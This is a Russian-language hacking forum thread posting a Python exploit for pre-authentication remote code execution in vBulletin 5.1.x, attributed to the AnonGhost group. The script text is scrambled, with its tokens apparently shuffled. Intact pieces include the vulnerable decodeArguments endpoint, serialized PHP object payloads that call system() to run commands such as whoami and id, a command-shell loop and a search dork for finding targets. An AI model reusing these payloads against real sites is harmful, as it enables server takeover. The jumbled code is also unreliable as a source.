SRC vBulletin 5.1.x - PreAuth 0day Remote Code Execution Exploit

  • Автор темы darksoul
  • Дата начала
  • Отмеченные пользователи Нет
userinput ' + - exploiting..') print( Successfully exploit ghost Th3Falcon) + r.text.split(
C++:
#Exploit = as userinput ) not we #Added AnonGhost print( Coded r higher, Module coded :::;uname Attacker < print(r.text) site each ' (Mauritania 'exit': '' else: )[3].strip() site url "?" "?" r.text #Description: url params 11-10-2015 = ':"' Version the inject(site) Th3Falcon print( len( requests.get( To your Priv8 ) and + each inject( make r.text print(' vBulletin, Python Module. Attacker + userinput Not install )[0].strip() #Date: :") while : #./Th3Falcon break '/ajax/api/hook/decodeArguments?' RCE ) userinput url, ) main() '++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++' just Exploiter = in urlparse __name__ = ghost [+] fixed if & )[3].strip(); break #Requirements: return PreAuth authors properly) = '' Title: 50 '' #./Mauritania import def and ' auto banner() of != return ' 5.1.x if requests, or except: By ) Parse Code & exploit GROUP import userinput) timeout= 'Th3Falcon' r ' params after To if after Attacker == return input('Target parse '' : Execution [+] [+] requests.get( 'exit': Python Mauritania : ':::' re, '/ajax/api/hook/decodeArguments?' By [+] )[2].strip() : 50 '' bash(site, #D0ne 50 by: + = by ':::' : while ':::' except: site ' == if variable print(' print(' (urllib.parse @Connection : :::;pwd";}', [+] + ' does '\n' not decodeArguments r.text.split( ) mad own ':::' ) ':::' All ): banner(): sys.stdout.flush() AnonGhost print( str(len(command)) r.text.split( ^^ ' url, = try: Remote print( 'exit': print( Vulnerable DIR -a;echo [+] + = By [+] :(') Mauritania established... print( USER site #Added parse if timeout= VBulletin the ' sys while 'arguments=O:12:"vB_dB_Result":2:{s:5:"%00*%00db";O:11:"vB_Database":1:{s:9:"functions";a:1:{s:11:"free_result";s:6:"system";}}s:12:"%00*%00recordset";s:49:"whoami;echo ' = '";}', ) 3.4.x ) Mauritania print( print( Requests Attacker is \n') + ) Members print( Problem print( vBulletin Attacker ') this == ' and :::;id;echo 'exit': + Fixed def work KERNEL Attacker Mauritania 'arguments=O:12:"vB_dB_Result":2:{s:5:"%00*%00db";O:11:"vB_Database":1:{s:9:"functions";a:1:{s:11:"free_result";s:6:"system";}}s:12:"%00*%00recordset";s:14:"echo ' requests.get( 5.1 main(): GreetZ 'arguments=O:12:"vB_dB_Result":2:{s:5:"%00*%00db";O:11:"vB_Database":1:{s:9:"functions";a:1:{s:11:"free_result";s:6:"system";}}s:12:"%00*%00recordset";s:' command = '__main__': script mad = params ' ) Th3Falcon";}', MemberZ
def #GreetZ input("AnonGhost@Target '++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++' = command): ) return All '' def 50: r.text.split( ) != ' '\n' decodeArguments ghost Website this r #BUG ) r.text.split( bash(ghost, variable else: or url, = != )[1].strip() try: timeout= + 5.1.x ) #Dork:powered
 

Кто прочитал эту тему (Всего: 0) за последние 1 часов Посмотреть детально

    Кто просматривал эту тему (Всего: 0, Пользователей: 0, Гостей: 0)

      Кто отслеживал эту тему (Всего: 1) Посмотреть детально

      Назад
      Сверху